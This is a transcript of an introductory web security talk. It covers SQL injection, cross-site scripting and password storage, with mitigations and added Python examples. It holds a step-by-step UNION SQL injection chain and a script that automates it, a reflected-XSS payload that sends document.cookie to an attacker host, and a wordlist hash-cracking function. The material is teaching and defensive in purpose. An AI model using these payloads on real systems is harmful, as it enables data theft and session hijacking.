Slide 1

Slide 1 text

Introduction to Web Security YEUK HON WONG @jwxie CUNY City College

Slide 2

Slide 2 text

Code ● All code can be found in https://github.com/yeukhon/websec-poc

Slide 3

Slide 3 text

I am one of you. Undergraduate in CS. Took CSC 480 with wes in spring. Mozilla Application Security intern in summer 2013.

Slide 4

Slide 4 text

Security is hard: No shit. Developers are users too. We have the right to understand security and be aware of the state of the art.

Slide 5

Slide 5 text

BIGGER PICTURE: “World's Biggest Data Breaches & Hacks visualization” - http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Slide 6

Slide 6 text

OWASP Top 10: lists the ten most critical web application security risks; the list is revised roughly every three years.

Slide 7

Slide 7 text

OWASP Top 10 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Slide 8

Slide 8 text

This talk
● SQL Injection
● Cross-site scripting (XSS)
● Password management

Slide 9

Slide 9 text

Risks of SQL Injection
● Remains #1 in the OWASP Top 10.
● Financial and trust loss:
 – Sensitive data leakage
 – DoS attack (usually in the form of data loss, e.g. dropped or corrupted tables)

Slide 10

Slide 10 text

SQL injection in the news

Slide 11

Slide 11 text

How does SQL injection work?

Slide 12

Slide 12 text

How does SQL injection work?

The handler pastes the id parameter straight into the SQL string, so anything after the number becomes part of the statement.

GET /users?id=1
SELECT * FROM users WHERE id = 1;
((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),)

GET /users?id=1 and 1=1
SELECT * FROM users WHERE id = 1 and 1=1;
((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),)

GET /users?id=1 and 1=2
SELECT * FROM users WHERE id = 1 and 1=2;
None

GET /users?id=1; DROP TABLE users;
SELECT * FROM users WHERE id = 1; DROP TABLE users;

The 1=1 / 1=2 pair is the classic probe: the same page with and then without the row proves the parameter is evaluated as SQL. Whether the stacked DROP actually runs depends on the driver; many MySQL client libraries refuse a second statement per call unless multi-statement support is switched on, so a failed DROP is no proof the endpoint is safe.

Slide 13

Slide 13 text

Complex queries

SELECT attr1, attr2 FROM users;
SELECT * FROM ranks;
SELECT percentage FROM progress;

In principle some of these attributes are never shown in the frontend: attr1 may be fetched but never rendered. An injection point still reaches everything the query, and the database user, can read.

Slide 14

Slide 14 text

Basic usage of SQL injection

Attacker:
1. Knows /users?id= is exploitable.
2. Wants to steal some sensitive data from some table (the same table or a different one).

Tools:
1. error-based attack, and
2. union-based attack.

Slide 15

Slide 15 text

UNION

UNION combines the result sets of two SELECT queries into a single table of rows. Both sides must return the same number of columns; UNION drops duplicate rows, UNION ALL keeps them.

table1:
Name   Amount
Alice  100
Bob    101

table2:
Name   Amount
Calvin 102
Derek  103

SELECT * FROM table1
UNION
SELECT * FROM table2;

Name   Amount
Alice  100
Bob    101
Calvin 102
Derek  103

Slide 16

Slide 16 text

Step 1: Number of attributes

The attacker has to find out how many columns the original SELECT returns, because UNION only works when both sides return the same number. Probing with a single column fails, so the query returns more than one.

GET /users?id=1 UNION ALL SELECT 1
SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1;
500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different number of columns')

Slide 17

Slide 17 text

Step 1: Number of attributes

Two columns still fail, so the query returns more than two.

GET /users?id=1 UNION ALL SELECT 1,2
SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2;
500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different number of columns')

Slide 18

Slide 18 text

Step 1: Number of attributes

With three columns the query succeeds, so the original SELECT returns three. That is all the attacker needs; how many columns the table itself has does not matter, only how many the query returns.

GET /users?id=1 UNION ALL SELECT 1,2,3
SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2,3;
((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), …)

Slide 19

Slide 19 text

Step 2: Find a table to query

The attacker also doesn't know which tables exist. First find out what database this is: put @@version into one of the UNION columns and it comes back as a row. In this case it is a MySQL 5.5.34 server. Note that the id in the first row is now the string '1': UNION coerces each column to a common type.

GET /users?id=1 UNION ALL SELECT @@version,2,3
SELECT * FROM users WHERE id = 1 UNION ALL SELECT @@version,2,3;
(('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('5.5.34-0ubuntu0.12.04.1', '2', '3'))

Slide 20

Slide 20 text

Step 2: Find a table to query

MySQL 5.0 and later expose the catalogue through information_schema, so table names can be read like any other data:

GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables
SELECT * FROM users WHERE id = 1 UNION SELECT 1, 2, table_name FROM information_schema.tables;
((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),
 (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'),
 (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'),
 …
 (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users'))

The system tables come first; the application's own tables, exercises and users, are at the end. Adding WHERE table_schema = database() drops the noise.

Slide 21

Slide 21 text

Step 3: Find columns in a table

The target is exercises; which columns does it have? The same trick against information_schema.columns:

GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns
SELECT * FROM users WHERE id = 1 UNION SELECT 1, 2, column_name FROM information_schema.columns;
((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),
 (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'DEFAULT_COLLATE_NAME'),
 …
 (1L, '2', 'exercise_name'), (1L, '2', 'exercises'))

As written this lists every column of every table; WHERE table_name = 'exercises' restricts it to the target.

Slide 22

Slide 22 text

Step 4: Get exercises out

We now know there is a second table, exercises, and we know some interesting columns. Bonus: even if the legitimate query never selects the password hash, UNION can pull it out of users in exactly the same way.

GET /users?id=1 UNION SELECT exercise_name, null, null from exercises
SELECT * FROM users WHERE id = 1 UNION SELECT exercise_name, null, null FROM exercises;
(('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('exercise_name_1', None, None))

Slide 23

Slide 23 text

Mitigations
● Don't construct SQL queries by string concatenation.
● Use the parameterised (placeholder) form provided by the database driver, usually called a prepared statement: the value is bound separately and is never parsed as SQL.
● Use an ORM (Rails ActiveRecord, Django ORM, SQLAlchemy are good). They parameterise for you, but raw-query escape hatches bring the problem straight back.
● Escaping user input is a last resort, not a substitute: it has to match the database's quoting rules exactly, and it does nothing for an unquoted numeric context like id = 1.
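Added example, not code from the talk or from the websec-poc repository: the UNION chain from slides 16 to 22 run end to end against a /users?id= handler that concatenates its parameter (the endpoint of slide 12), and then against the parameterised handler recommended above. An in-memory SQLite database stands in for the MySQL server. Its schema (users(id, username, password_hash), exercises(id, exercise_name)) and the second exercise row are assumptions based on the slides, and because SQLite has no information_schema the metadata is read from sqlite_master instead.

```python
# Added example (not from the talk's repo). Replays the slides' UNION chain
# against a string-concatenated handler, then against a parameterised one.
# Schema and rows below are assumed from the slides; SQLite stands in for MySQL.
import sqlite3

SLIDE_HASH = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"  # hash shown on the slides


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        CREATE TABLE exercises (id INTEGER PRIMARY KEY, exercise_name TEXT);
        INSERT INTO users VALUES (1, 'yeukhon', '{SLIDE_HASH}');
        INSERT INTO exercises VALUES (1, 'exercise_name_1'), (2, 'exercise_name_2');
    """)
    return conn


def get_user_vulnerable(conn, user_id):
    """/users?id= as the slides show it: the raw query-string value is glued into SQL."""
    return conn.execute("SELECT * FROM users WHERE id = " + user_id).fetchall()


def get_user_safe(conn, user_id):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()


# --- attacker's side: every function takes a callable query(payload) -> rows ---

def find_column_count(query, max_cols=10):
    """Step 1: widen 'UNION ALL SELECT 1,2,...' until the injected marker row comes back."""
    for n in range(1, max_cols + 1):
        marker = tuple(range(1, n + 1))
        try:
            rows = query("1 UNION ALL SELECT " + ",".join(map(str, marker)))
        except sqlite3.OperationalError:
            continue  # column-count mismatch, SQLite's version of MySQL error 1222
        if marker in rows:
            return n
    return None


def list_tables(query, ncols):
    """Step 2: pull table names out through the first column, NULL-padding the rest."""
    pad = ", NULL" * (ncols - 1)
    rows = query(f"1 UNION SELECT name{pad} FROM sqlite_master WHERE type = 'table'")
    return sorted(r[0] for r in rows if isinstance(r[0], str))


def table_ddl(query, ncols, table):
    """Step 3: the CREATE statement stored in sqlite_master lists the target's columns."""
    pad = ", NULL" * (ncols - 1)
    rows = query(f"1 UNION SELECT sql{pad} FROM sqlite_master WHERE name = '{table}'")
    return next(r[0] for r in rows if isinstance(r[0], str))


def dump_exercises(query, ncols):
    """Step 4: the slide's final payload, real data in column one, NULLs elsewhere."""
    pad = ", NULL" * (ncols - 1)
    rows = query(f"1 UNION SELECT exercise_name{pad} FROM exercises")
    return sorted(r[0] for r in rows if isinstance(r[0], str))


def run_chain(query):
    """Whole chain; returns None when step 1 already fails (no injection point)."""
    ncols = find_column_count(query)
    if ncols is None:
        return None
    return {
        "columns": ncols,
        "tables": list_tables(query, ncols),
        "exercises_ddl": table_ddl(query, ncols, "exercises"),
        "exercises": dump_exercises(query, ncols),
    }


def stacked_statement_blocked(conn):
    """Slide 12's 'id=1; DROP TABLE users': this driver refuses a second statement per call."""
    try:
        get_user_vulnerable(conn, "1; DROP TABLE users")
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", run_chain(lambda p: get_user_vulnerable(db, p)))
    print("parameterised:", run_chain(lambda p: get_user_safe(db, p)))
    print("stacked DROP blocked by driver:", stacked_statement_blocked(db))
```

Against the concatenating handler the chain reports three columns, the tables exercises and users, the CREATE statement naming exercise_name, and both exercise rows. Against the parameterised handler the whole payload is bound as one text value, the id column never matches it, the marker row never appears and run_chain gives up at step 1. The stacked DROP is rejected by the driver before it reaches the database, which is the driver caveat from slide 12 rather than a defence to rely on.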

Slide 24

Slide 24 text

Cross-site scripting (XSS)

Slide 25

Slide 25 text

XSS
● XSS is the injection of attacker-controlled content into a page that other users' browsers render: JavaScript most of all, but also HTML and CSS.
● I consider this the most common, the cheapest vulnerability.
 – Personal, school and corporate websites are almost always vulnerable.

Slide 26

Slide 26 text

Risks of XSS
● Loading malicious code.
● Phishing attacks
 – Iframe attack
 – Clickjacking
● Redirect attack
● Cookie stealing

Slide 27

Slide 27 text

Types of XSS
● Reflected XSS
 – the payload travels in the request (usually a URL parameter) and the server echoes it back into the response
● Stored/persistent XSS
 – the payload is saved, typically in the database, and served to every visitor of the page
● DOM-based XSS
 – client-side JavaScript writes attacker-controlled data (location.hash, the query string, postMessage data) into the DOM; the server's response itself may be clean

Slide 28

Slide 28 text

Reflected XSS
● The attacker injects some script (JS, HTML or CSS) into a request parameter, usually the URL, and the server echoes it unescaped into the document it returns.

Slide 29

Slide 29 text

HTML with Reflected XSS

Input <h1>This is some h1 title</h1> into the search bar. The resulting request:

GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E

The page echoes the search term unescaped, so the browser renders a heading instead of showing the text.

Slide 30

Slide 30 text

Iframe with Reflected XSS

We can create an iframe in the current document:

GET /xss?search=<iframe src="…" height="100%" width="30%">

Slide 31

Slide 31 text

Redirect with Reflected XSS

On loading the document we can tell the browser to navigate to another website. The attacker can send the victim to a forged login page while the victim believes he or she is still on the legitimate site.

GET /xss?search=<script>document.location.href="http://google.com"</script>

Slide 32

Slide 32 text

Cookie Stealing with Reflected XSS

The browser's Same Origin Policy stops the page from reading a cross-origin response, but it does not stop the request from being sent. The injected script makes a GET to the attacker's host in the background with document.cookie appended to the URL; the cookie lands in the attacker's access log even though the response is blocked.

GET /xss?search=<script>
xhr=new XMLHttpRequest();
xhr.open("GET","http://192.168.33.60:8081/?cookie=" + document.cookie,true);
xhr.send();
</script>

Slide 33

Slide 33 text

Stored XSS

The code is injected into the database; the application doesn't escape it on output, so every browser that loads the page reads it as valid HTML. This is much more serious: imagine someone posting a comment containing XSS on a bulletin board, where every reader of the thread runs it.

Slide 34

Slide 34 text

XSS Mitigations
1. Escape on output, for the context the data lands in: HTML entities in element content and attributes, JavaScript string escaping (JSON serialisation works here) inside a script block, URL-encoding inside a URL. Escaping once at input time is not enough, because the same value can end up in several contexts.
2. Set the HttpOnly flag on session cookies so document.cookie cannot read them, and the Secure flag so they are only sent over HTTPS. This defeats the cookie-stealing payload above; it does not stop an injected script from making requests with the victim's session.
3. Avoid rendering user-supplied markup as HTML. For example, don't mark user data as safe in Django's templates (|safe, mark_safe) or turn autoescaping off.
4. Add a Content-Security-Policy header that disallows inline script and style. It is defence in depth that blunts a missed escape, not a replacement for fixing the escaping.

Slide 35

Slide 35 text

Password

Slide 36

Slide 36 text

Hashing algorithms
● Use cryptographically strong hash functions.
● Fast hashing vs work-factor hashing: a general-purpose hash is designed to be fast, which is exactly what a password cracker wants.
● MD5: broken.
● SHA family (use SHA-2 for general-purpose hashing).
● For passwords use a salted, deliberately slow function: bcrypt, scrypt or PBKDF2, with a cost parameter you can raise as hardware gets faster.
● The users row dumped in the SQL injection slides stores 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8, which is the unsalted SHA-1 of the string "password": a single wordlist lookup recovers it.
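Added example, not code from the talk: it checks the observation above against the hash that appears on the SQL injection slides, then shows the work-factor alternative using only the standard library, PBKDF2-HMAC-SHA256 with a random per-user salt, a self-describing stored format and a constant-time compare. bcrypt and scrypt are equally good choices; PBKDF2 is used here because hashlib ships it. The iteration count and the wordlist are assumptions for illustration.

```python
# Added example (not from the talk). Unsalted SHA-1 as on the slides versus a
# salted PBKDF2 store. Iteration count and wordlist are illustrative assumptions.
import hashlib
import hmac
import os
import time

SLIDE_HASH = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"  # hash from the users row on the slides
ITERATIONS = 200_000  # assumed; tune so one verify costs tens of milliseconds on your hardware


def unsalted_sha1(password):
    """What the slides' users table stores: fast, unsalted, identical for every user with that password."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack_unsalted(target_hex, wordlist):
    """A wordlist attack costs one SHA-1 per guess, and one precomputed table serves every user."""
    for guess in wordlist:
        if unsalted_sha1(guess) == target_hex:
            return guess
    return None


def hash_password(password, iterations=ITERATIONS):
    """Store algorithm, iterations, salt and digest together so the cost can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the parameters stored next to the digest; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def guesses_per_second(hasher, seconds=0.2):
    """Rough single-core throughput of one hash function here (the 'cost to break' axis)."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        hasher("password")
        n += 1
    return n / seconds


if __name__ == "__main__":
    wordlist = ["123456", "letmein", "password", "qwerty"]  # constructed sample
    print("slide hash cracked as:", crack_unsalted(SLIDE_HASH, wordlist))
    stored = hash_password("password")
    print(stored)
    print("verify ok:", verify_password("password", stored),
          "wrong case:", verify_password("Password", stored))
    print("sha1 guesses/s:", int(guesses_per_second(unsalted_sha1)))
    print("pbkdf2 guesses/s:", int(guesses_per_second(hash_password)))
```

The last two lines are the point of the slide: on the same machine the unsalted SHA-1 is tested millions of times per second while the PBKDF2 store manages a handful, and the per-user salt means each user has to be attacked separately instead of against one shared table.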

Slide 37

Slide 37 text

Cost to break

Slide 38

Slide 38 text

Don't ask for passwords if you don't have to. Even big companies get password storage wrong. The talk's suggestion was to adopt Mozilla Persona; Persona was shut down in November 2016, so today the same advice means delegating login to an established identity provider over a standard protocol such as OpenID Connect.

Slide 39

Slide 39 text

Questions? @jwxie github.com/yeukhon speakerdeck.com/yeukhon

Slide 40

Slide 40 text

:p Thank you!